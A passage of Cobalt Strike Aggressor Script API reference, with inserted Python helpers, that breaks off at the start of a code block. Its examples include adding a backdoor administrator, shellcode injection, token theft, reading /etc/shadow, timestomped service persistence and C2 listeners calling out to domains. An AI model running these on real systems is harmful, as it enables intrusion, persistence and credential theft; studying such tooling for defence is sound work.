
Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the screenshot tool

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "&Screenwatch" {
   binput($1, "screenwatch");
   bscreenwatch($1);
}
Inject into the specified process
bscreenwatch($1, 1234, "x64");

bsetenv

Ask Beacon to set an environment variable

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the environment variable to set

$3 - the value to set the environment variable to (specify $null to unset the variable)

Example

alias tryit {
   bsetenv($1, "foo", "BAR!");
   bshell($1, "echo %foo%");
}

bshell

Ask Beacon to run a command with cmd.exe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

alias adduser {
   bshell($1, "net user $2 B00gyW00gy1234! /ADD");
   bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}

bshinject

Inject shellcode (from a local file) into a specific process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the process to inject into

$3 - the process architecture (x86 | x64)

$4 - the local file with the shellcode

Example

bshinject($1, 1234, "x86", "/path/to/stuff.bin");

bshspawn

Spawn shellcode (from a local file) into another process. This function benefits from Beacon's configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process architecture (x86 | x64)

$3 - the local file with the shellcode

Example

bshspawn($1, "x86", "/path/to/stuff.bin");

bsleep

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the number of seconds between beacons.

$3 - the jitter factor [0-99]

Example

alias stealthy {
   # sleep for 1 hour with 30% jitter factor
   bsleep($1, 60 * 60, 30);
}

bsleepu

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - beacon sleep period string.

The beacon sleep period string takes the format: ud vh xm ys zj

Where:

u is the number of days

v is the number of hours

x is the number of minutes

y is the number of seconds

z is the jitter factor [0 - 99]

Example

alias stealthy {
   # sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
   bsleepu($1, "2d 13h 45m 8s 30j");
}
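As an added example (not from the original page or from Cobalt Strike), a Python parser for the sleep period string that bsleepu accepts, with the inverse that turns a bsleep-style seconds/jitter pair into the same string. It rejects unknown unit letters, repeated units and a jitter factor outside 0-99, which is what an analyst reconstructing a session's check-in cadence from an engagement log needs. interval_bounds assumes jitter shortens each interval by up to the jitter factor; that behaviour is not stated on this page.

```python
import re

# seconds per unit letter in the "ud vh xm ys zj" sleep period string
_UNIT_SECONDS = {"d": 86400, "h": 3600, "m": 60, "s": 1}
_TOKEN = re.compile(r"^(\d+)([dhmsj])$")


def parse_sleep_period(period: str) -> tuple[int, int]:
    """Return (total_seconds, jitter) for a bsleepu-style period string.

    Raises ValueError on an empty string, an unknown unit letter, a unit
    given twice, or a jitter factor outside 0-99.
    """
    tokens = period.split()
    if not tokens:
        raise ValueError("empty sleep period string")
    seconds, jitter, seen = 0, 0, set()
    for tok in tokens:
        m = _TOKEN.match(tok)
        if m is None:
            raise ValueError(f"bad token {tok!r}: expected <number><d|h|m|s|j>")
        value, unit = int(m.group(1)), m.group(2)
        if unit in seen:
            raise ValueError(f"unit {unit!r} given more than once")
        seen.add(unit)
        if unit == "j":
            if not 0 <= value <= 99:
                raise ValueError("jitter factor must be in 0-99")
            jitter = value
        else:
            seconds += value * _UNIT_SECONDS[unit]
    return seconds, jitter


def is_valid_sleep_period(period: str) -> bool:
    """True when the string parses under the rules above."""
    try:
        parse_sleep_period(period)
        return True
    except ValueError:
        return False


def format_sleep_period(seconds: int, jitter: int = 0) -> str:
    """Inverse of parse_sleep_period: a bsleep-style pair to a period string.

    Zero units are omitted; a zero interval becomes "0s"; jitter is appended
    only when non-zero.
    """
    if seconds < 0 or not 0 <= jitter <= 99:
        raise ValueError("seconds must be >= 0 and jitter in 0-99")
    parts = []
    remaining = seconds
    for unit in ("d", "h", "m", "s"):
        value, remaining = divmod(remaining, _UNIT_SECONDS[unit])
        if value:
            parts.append(f"{value}{unit}")
    if not parts:
        parts.append("0s")
    if jitter:
        parts.append(f"{jitter}j")
    return " ".join(parts)


def interval_bounds(seconds: int, jitter: int) -> tuple[int, int]:
    """Shortest and longest check-in interval implied by a sleep/jitter pair.

    Assumption (not stated on this page): jitter shortens each interval by a
    random percentage of up to the jitter factor, so the upper bound is the
    sleep time itself and the lower bound is sleep * (100 - jitter) / 100.
    """
    return seconds * (100 - jitter) // 100, seconds


if __name__ == "__main__":
    secs, jit = parse_sleep_period("2d 13h 45m 8s 30j")
    print(secs, jit, format_sleep_period(secs, jit), interval_bounds(secs, jit))
```

The round trip parse_sleep_period(format_sleep_period(s, j)) == (s, j) holds for any non-negative s, which makes the formatter a convenient way to turn the numeric form used by bsleep into the string form bsleepu expects.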

bsocks

Start a SOCKS proxy server associated with a beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to

$3 - SOCKS version [SOCKS4|SOCKS5] Default: SOCKS4

For SOCKS 5 only:

$4 - enable/disable NoAuth authentication [enableNoAuth|disableNoAuth] Default: enableNoAuth

$5 - username for User/Password authentication [blank|username] Default: Blank

$6 - password for User/Password authentication [blank|password] Default: Blank

$7 - enable logging [enableLogging|disableLogging] Default: disableLogging

Example

alias socksPorts {
   bsocks($1, 10401);
   bsocks($1, 10402, "SOCKS4");
   bsocks($1, 10501, "SOCKS5");
   bsocks($1, 10502, "SOCKS5", "enableNoAuth", "", "", "disableLogging");
   bsocks($1, 10503, "SOCKS5", "enableNoAuth", "myname", "mypassword", "disableLogging");
   bsocks($1, 10504, "SOCKS5", "disableNoAuth", "myname", "mypassword", "enableLogging");
}

bsocks_stop

Stop SOCKS proxy servers associated with the specified Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias stopsocks {
   bsocks_stop($1);
}

bspawn

Ask Beacon to spawn a new session

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the listener to target.

$3 - the architecture to spawn a process for (defaults to current beacon arch)

Example

item "&Spawn" {
   openPayloadHelper(lambda({
      binput($bids, "spawn x86 $1");
      bspawn($bids, $1, "x86");
   }, $bids => $1));
}

bspawnas

Ask Beacon to spawn a session as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the listener to spawn

Example

bspawnas($1, "CORP", "Administrator", "toor", "my listener");

bspawnto

Change the default program Beacon spawns to inject capabilities into.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the architecture we're modifying the spawnto setting for (x86, x64)

$3 - the program to spawn

Notes

The value you specify for spawnto has to work from x86->x86, x86->x64, x64->x86, and x64->x64 contexts. This is tricky. Follow these rules and you'll be OK:

1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.

2. Environment variables (e.g., %windir%) are OK within these paths.

3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it's necessary.

4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.

Example

# let's make everything lame.
on beacon_initial {
   binput($1, "prep session with new spawnto values.");
   bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
   bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
}

bspawnu

Ask Beacon to spawn a session under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to spawn this session under

$3 - the listener to spawn

Example

bspawnu($1, 1234, "my listener");

bspunnel

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));

bspunnel_local

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward). Note: this reverse port forward tunnel traverses through the Beacon chain to the team server and, via the team server, out through the requesting Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));

bssh

Ask Beacon to spawn an SSH session.

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - password

$6 - the PID to inject the SSH client into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

# spawn a temporary process
bssh($1, "172.16.20.128", 22, "root", "toor");

# inject into the specified process
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");

bssh_key

Ask Beacon to spawn an SSH session using the data from a key file. The key file needs to be in the PEM format. If the file is not in the PEM format then make a copy of the file and convert the copy with the following command:

/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - key data (as a string)

$6 - the PID to inject the SSH client into or $null

$7 - the architecture of the target PID (x86|x64) or $null

Example

alias myssh {
   $pid = $2;
   $arch = $3;
   $handle = openf("/path/to/key.pem");
   $keydata = readb($handle, -1);
   closef($handle);

   if ($pid >= 0 && ($arch eq "x86" || $arch eq "x64")) {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
   } else {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata);
   }
}

bstage

REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.

bsteal_token

Ask Beacon to steal a token from a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from

Use:

bsteal_token [pid]
bsteal_token [pid] <OpenProcessToken access mask>

OpenProcessToken access mask suggested values:

blank = default (TOKEN_ALL_ACCESS)
0 = TOKEN_ALL_ACCESS
11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)

Access mask values:

STANDARD_RIGHTS_REQUIRED : 983040
TOKEN_ASSIGN_PRIMARY     : 1
TOKEN_DUPLICATE          : 2
TOKEN_IMPERSONATE        : 4
TOKEN_QUERY              : 8
TOKEN_QUERY_SOURCE       : 16
TOKEN_ADJUST_PRIVILEGES  : 32
TOKEN_ADJUST_GROUPS      : 64
TOKEN_ADJUST_DEFAULT     : 128
TOKEN_ADJUST_SESSIONID   : 256

NOTE:

Specifying an OpenProcessToken access mask can help when stealing a token from a process running as the SYSTEM user fails with the error: Could not open process token: {pid} (5)

You can set your preferred default with '.steal_token_access_mask' in the Malleable C2 global options.

Example

alias steal_token {
   bsteal_token($1, int($2));
}

bsudo

Ask Beacon to run a command via sudo (SSH sessions only)

Arguments

$1 - the id for the session. This may be an array or a single ID.

$2 - the password for the current user

$3 - the command and arguments to run

Example

# hashdump [password]
ssh_alias hashdump {
   bsudo($1, $2, "cat /etc/shadow");
}

bsyscall_method

Ask Beacon to change its syscall method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the syscall method. Supported methods are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

NOTE:

If the $2 argument is empty, Beacon is tasked to query the currently used syscall method.

Example

alias syscall_method {
   bsyscall_method($1, $2);
}

btask

Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike's Activity Report and Sessions Report.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

$3 - a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.

https://attack.mitre.org

Example

alias foo {
   btask($1, "User tasked beacon to foo", "T1015");
}

btimestomp

Ask Beacon to change the file modified/accessed/created times to match another file.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to update timestamp values for

$3 - the file to grab timestamp values from

Example

alias persist {
   bcd($1, "c:\\windows\\system32");
   bupload($1, script_resource("evil.exe"));
   btimestomp($1, "evil.exe", "cmd.exe");
   bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
   bshell($1, 'sc start evil');
}

btoken_store_remove

Ask Beacon to remove specific access tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of token IDs to remove.

Example

alias token-store_remove {
   btoken_store_remove($1, @(int($2)));
}

btoken_store_remove_all

Ask Beacon to remove all tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_remove_all {
   btoken_store_remove_all($1);
}

btoken_store_show

Ask Beacon to print the tokens currently available in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_show {
   btoken_store_show($1);
}

btoken_store_steal

Ask Beacon to steal a token and store it in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of PIDs to take the tokens from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal {
   btoken_store_steal($1, @(int($2)), 11);
}

btoken_store_steal_and_use

Ask Beacon to steal a token, store it and immediately apply it to the beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal_and_use {
   btoken_store_steal_and_use($1, int($2), 11);
}

btoken_store_use

Ask Beacon to use a token from the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the token ID.

Example

alias token-store_use {
   btoken_store_use($1, int($2));
}

bunlink

Ask Beacon to unlink a Beacon it is connected to over a TCP socket or named pipe.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target host to unlink (specified as an IP address)

$3 - [optional] the PID of the target session to unlink

Example

bunlink($1, "172.16.48.3");

bupload

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the file to upload

Example

bupload($1, script_resource("evil.exe"));

bupload_raw

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote file name of the file

$3 - the raw content of the file

$4 - [optional] the local path to the file (if there is one)

Example

$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);

bwdigest

REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.

bwinrm

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options.

bwmi

REMOVED Removed in Cobalt Strike 4.0.

call

Issue a call to the team server.

Arguments

$1 - the command name

$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.

... - one or more arguments to pass into this call.

Example

call("aggressor.ping", { warn(@_); }, "this is my value");

closeClient

Close the current Cobalt Strike team server connection.

Example

closeClient();

colorPanel

Generate a Java component to set accent colors within Cobalt Strike's data model

Arguments

$1 - the prefix

$2 - an array of IDs to change colors for

Example

popup targets {
   menu "&Color" {
      insert_component(colorPanel("targets", $1));
   }
}

See also

&highlight

credential_add

Add a credential to the data model

Arguments

$1 - username

$2 - password

$3 - realm

$4 - source

$5 - host

Example

command falsecreds {
   for ($x = 0; $x < 100; $x++) {
      credential_add("user $+ $x", "password $+ $x");
   }
}

credentials

Returns a list of application credentials in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each credential entry.

Example

printAll(credentials());

data_keys

List the query-able keys from Cobalt Strike's data model

Returns

A list of keys that you may query with &data_query

Example

foreach $key (data_keys()) {
   println("\n\c4=== $key ===\n");
   println(data_query($key));
}

data_query

Queries Cobalt Strike's data model

Arguments

$1 - the key to pull from the data model

Returns

A Sleep representation of the queried data.

Example

println(data_query("targets"));

dbutton_action

Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.

Arguments

$1 - the $dialog object

$2 - the button label

Example

dbutton_action($dialog, "Start");
dbutton_action($dialog, "Stop");

dbutton_help

Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user's browser to the specified URL.

Arguments

$1 - the $dialog object

$2 - the URL to go to

Example

dbutton_help($dialog, "http://www.google.com");

dialog

Create a dialog. Use &dialog_show to show it.

Arguments

$1 - the title of the dialog

$2 - a %dictionary mapping row names to default values

$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.

Returns

A scalar with a $dialog object.

Example

sub callback {
   # prints: Pressed Go, a is: Apple
   println("Pressed $2 $+ , a is: " . $3['a']);
}

$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit:  ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);

dialog_description

Adds a description to a &dialog

Arguments

$1 - a $dialog object

$2 - the description of this dialog

Example

dialog_description($dialog, "I am the Hello World dialog.");

dialog_show

Shows a &dialog.

Arguments

$1 - the $dialog object

Example

dialog_show($dialog);

dispatch_event

Call a function in Java Swing's Event Dispatch Thread. Java's Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.

Arguments

$1 - the function to call

Example

dispatch_event({
   println("Hello World"); 
});

downloads

Returns a list of downloads in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each downloaded file.

Example

printAll(downloads());

drow_beacon

Adds a beacon selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_beacon($dialog, "bid", "Session: ");

drow_checkbox

Adds a checkbox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - the text next to the checkbox

Example

drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");

drow_combobox

Adds a combobox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - an array of options to choose from

Example

drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));

drow_exploits

Adds a privilege escalation exploit selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_exploits($dialog, "exploit", "Exploit: ");

drow_file

Adds a file chooser row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_file($dialog, "file", "Choose: ");

drow_interface

Adds a VPN interface selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_interface($dialog, "int", "Interface: ");

drow_krbtgt

Adds a krbtgt selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_krbtgt($dialog, "hash", "krbtgt hash: ");

drow_listener

Adds a listener selection row to a &dialog. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener($dialog, "listener", "Listener: ");

drow_listener_smb

DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to &drow_listener_stage

drow_listener_stage

Adds a listener selection row to a &dialog. This row shows all Beacon and Foreign listener payloads.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener_stage($dialog, "listener", "Stage: ");

drow_mailserver

Adds a mail server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_mailserver($dialog, "mail", "SMTP Server: ");

drow_proxyserver

DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener.

Adds a proxy server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_proxyserver($dialog, "proxy", "Proxy: ");

drow_site

Adds a site/URL field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_site($dialog, "url", "Site: ");

drow_text

Adds a text field row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - Optional. The width of this text field (in characters). This value isn't always honored (it won't shrink the field, but it will make it wider).

Example

drow_text($dialog, "name", "Name: ");

drow_text_big

Adds a multi-line text field to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_text_big($dialog, "addr", "Address: ");

dstamp

Format a time into a date/time value. This value includes seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . dstamp(ticks()));

See also

&tstamp

elog

Publish a notification to the event log

Arguments

$1 - the message

Example

elog("The robot invasion has begun!");

encode

Obfuscate a position-independent blob of code with an encoder.

Arguments

$1 - position independent code (e.g., shellcode, "raw" stageless Beacon) to apply encoder to

$2 - the encoder to use

$3 - the architecture (e.g., x86, x64)

Encoder   Description
alpha     Alphanumeric encoder (x86-only)
xor       XOR encoder

Notes

  • The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
  • alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.

Returns

A position-independent blob that decodes the original string and passes execution to it.

Example

# generate shellcode for a listener
$stager = shellcode("my listener", false, "x86");

# encode it.
$stager = encode($stager, "xor", "x86");

extract_reflective_loader

Extract the executable code for a reflective loader from a Beacon Object File (BOF).

Arguments

$1 - Beacon Object File data that contains a reflective loader.

Returns

The Reflective Loader binary executable code extracted from the Beacon Object File data.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# extract loader from BOF.
# ---------------------------------------------------------------------
$loader = extract_reflective_loader($data);

file_browser

Open the File Browser. This function does not have any parameters.

fireAlias

Runs a user-defined alias

Arguments

$1 - the beacon id to run the alias against

$2 - the alias name to run

$3 - the arguments to pass to the alias.

Example

# run the foo alias when a new Beacon comes in
on beacon_initial {
   fireAlias($1, "foo", "bar!");
}

fireEvent

Fire an event.

Arguments

$1 - the event name

... - the event arguments.

Example

on foo {
   println("Argument is: $1");
}

fireEvent("foo", "Hello World!");

format_size

Formats a number into a size (e.g., 1024 => 1kb)

Arguments

$1 - the size to format

Returns

A string representing a human readable data size.

Example

println(format_size(1024));

getAggressorClient

Returns the aggressor.AggressorClient Java object. This can reach anything internal within the current Cobalt Strike client context.

Example

$client = getAggressorClient();

gunzip

Decompress a string (GZIP).

Arguments

$1 - the string to decompress

Returns

The argument processed by the gzip de-compressor

Example

println(gunzip(gzip("this is a test")));

See also

&gzip

gzip

GZIP a string.

Arguments

$1 - the string to compress

Returns

The argument processed by the gzip compressor

Example

println(gzip("this is a test"));

See also

&gunzip

highlight

Insert an accent (color highlight) into Cobalt Strike's data model

Arguments

$1 - the data model

$2 - an array of rows to highlight

$3 - the accent type

Notes

  • Data model rows include: applications, beacons, credentials, listeners, services, and targets.
  • Accent options are:

Accent    Color
[empty]   no highlight
good      Green
bad       Red
neutral   Yellow
ignore    Grey
cancel    Dark Blue

Example

command admincreds {
   local('@creds');
   
   # find all of our creds that are user Administrator.
   foreach $entry (credentials()) {
      if ($entry['user'] eq "Administrator") {
         push(@creds, $entry);
      }
   }
   
   # highlight all of them green!
   highlight("credentials", @creds, "good");
}

host_delete

Delete a host from the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

Example

# clear all hosts
host_delete(hosts());

host_info

Get information about a target.

Arguments

$1 - the host IPv4 or IPv6 address

$2 - [Optional] the key to extract a value for

Returns

%info = host_info("address");

Returns a dictionary with known information about this target.

$value = host_info("address", "key");

Returns the value for the specified key from this target's entry in the data model.

Example

# create a script console alias to dump host info
command host {
   println("Host $1");
   foreach $key => $value (host_info($1)) {
      println("$[15]key $value");
   }
}

host_update

Add or update a host in the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

$2 - the DNS name of this target

$3 - the target's operating system

$4 - the operating system version number (e.g., 10.0)

$5 - a note for the target.

Note

You may specify a $null value for any argument and, if the host exists, no change will be made to that value.

Example

host_update("192.168.20.3", "DC", "Windows", 10.0);

hosts

Returns a list of IP addresses from Cobalt Strike's target model

Returns

An array of IP addresses

Example

printAll(hosts());

insert_component

Add a javax.swing.JComponent object to the menu tree

Arguments

$1 - the component to add

insert_menu

Bring menus associated with a popup hook into the current menu tree.

Arguments

$1 - the popup hook

... - additional arguments are passed to the child popup hook.

Example

popup beacon {
   # menu definitions above this point
   
   insert_menu("beacon_bottom", $1);
   
   # menu definitions below this point
}

iprange

Generate an array of IPv4 addresses based on a string description

Arguments

$1 - a string with a description of IPv4 ranges

Range                        Result
192.168.1.2                  The IPv4 address 192.168.1.2
192.168.1.1, 192.168.1.2     The IPv4 addresses 192.168.1.1 and 192.168.1.2
192.168.1.0/24               The IPv4 addresses 192.168.1.0 through 192.168.1.255
192.168.1.18-192.168.1.30    The IPv4 addresses 192.168.1.18 through 192.168.1.29
192.168.1.18-30              The IPv4 addresses 192.168.1.18 through 192.168.1.29

Returns

An array of IPv4 addresses within the specified ranges.

Example

printAll(iprange("192.168.1.0/25"));
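Added example (my own Python, not Cobalt Strike's implementation of &iprange): an expansion of the range description syntax in the table above, built on the standard ipaddress module. It handles the five documented forms, including the exclusive upper bound the table gives for dash ranges, so an analyst can expand or validate the same notation in a scope definition or allowlist offline. The function name and the error handling are assumptions of this example.

```python
from __future__ import annotations

import ipaddress


def expand_iprange(description: str) -> list[str]:
    """Expand a comma-separated IPv4 range description into a list of addresses.

    Supported forms, following the documented table:
      192.168.1.2                a single address
      192.168.1.1, 192.168.1.2   several entries separated by commas
      192.168.1.0/24             a CIDR block; network and broadcast addresses are included
      192.168.1.18-192.168.1.30  a dash range; the upper bound is exclusive (.18 through .29)
      192.168.1.18-30            the same range with the end given as a last octet only
    """
    addresses: list[str] = []
    for entry in description.split(","):
        entry = entry.strip()
        if not entry:
            continue
        if "/" in entry:
            # strict=False also accepts a host address with a prefix length (192.168.1.2/24)
            network = ipaddress.IPv4Network(entry, strict=False)
            addresses.extend(str(addr) for addr in network)
        elif "-" in entry:
            start_text, end_text = (part.strip() for part in entry.split("-", 1))
            start = ipaddress.IPv4Address(start_text)
            if "." not in end_text:
                # shorthand form: the end value replaces only the last octet of the start address
                end_text = start_text.rsplit(".", 1)[0] + "." + end_text
            end = ipaddress.IPv4Address(end_text)
            if end < start:
                raise ValueError(f"range {entry!r} ends before it starts")
            # exclusive upper bound, as the documented table states
            addresses.extend(str(ipaddress.IPv4Address(n)) for n in range(int(start), int(end)))
        else:
            addresses.append(str(ipaddress.IPv4Address(entry)))
    return addresses


def in_ranges(description: str, address: str) -> bool:
    """True when address falls inside any range of the description."""
    return str(ipaddress.IPv4Address(address)) in set(expand_iprange(description))


if __name__ == "__main__":
    # constructed sample input, the value used in the example above
    for addr in expand_iprange("192.168.1.0/25"):
        print(addr)
```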

keystrokes

Returns a list of keystrokes from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about recorded keystrokes.

Example

printAll(keystrokes());

licenseKey

Get the license key for this instance of Cobalt Strike

Returns

Your license key.

Example

println("Your key is: " . licenseKey());

listener_create

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - the listener host

$4 - the listener port

$5 - a comma separated list of addresses for listener to beacon to

Example

# create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https", 
      "ads.losenolove.com", 443);

# create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
      "www.losenolove.com", 80, 
      "www.losenolove.com, www2.losenolove.com");

listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - a map with key/value pairs that specify options for the listener

Note

The following payload options are valid for $2:

Payload                              Type
windows/beacon_dns/reverse_dns_txt   Beacon DNS
windows/beacon_http/reverse_http     Beacon HTTP
windows/beacon_https/reverse_https   Beacon HTTPS
windows/beacon_bind_pipe             Beacon SMB
windows/beacon_bind_tcp              Beacon TCP
windows/beacon_extc2                 External C2
windows/foreign/reverse_http         Foreign HTTP
windows/foreign/reverse_https        Foreign HTTPS

The following keys are valid for $3:

Key        DNS             HTTP/S             SMB         TCP (Bind)
althost                    HTTP Host Header
bindto     bind port       bind port
beacons    c2 hosts        c2 hosts                       bind host
host       staging host    staging host
maxretry   maxretry        maxretry
port       c2 port         c2 port            pipe name   port
profile                    profile variant
proxy                      proxy config
strategy   host rotation   host rotation

The following host rotation values are valid for the 'strategy' key:

Option
round-robin
random
failover
failover-5x
failover-50x
failover-100x
failover-1m
failover-5m
failover-15m
failover-30m
failover-1h
failover-3h
failover-6h
failover-12h
failover-1d
rotate-1m
rotate-5m
rotate-15m
rotate-30m
rotate-1h
rotate-3h
rotate-6h
rotate-12h
rotate-1d

Note

The maxretry value uses the following syntax of exit-[max_attempts]-[increase_attempts]-[duration][m,h,d]. For example 'exit-10-5-5m' will exit beacon after 10 failed attempts and will increase sleep time after 5 failed attempts to 5 minutes. The sleep time will not be updated if the current sleep time is greater than the specified duration value. The sleep time will be affected by the current jitter value. On a successful connection the failed attempts count will be reset to zero and the sleep time will be reset to the prior value.
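Added example (my own model in Python, not Cobalt Strike code): a parser for the maxretry syntax and a small state machine that replays the behaviour the paragraph describes: the failure count that triggers an exit, the switch to the longer sleep once the increase threshold is reached (left alone when the current sleep is already longer), and the reset of both on a successful connection. Jitter is not modelled, since it only perturbs the effective sleep around the base value tracked here. Whether the increase applies at exactly increase_attempts failures or only after them is not stated; this example assumes "at". A model like this lets a detection engineer reason about the check-in gap to expect from a Beacon whose C2 has been blocked.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

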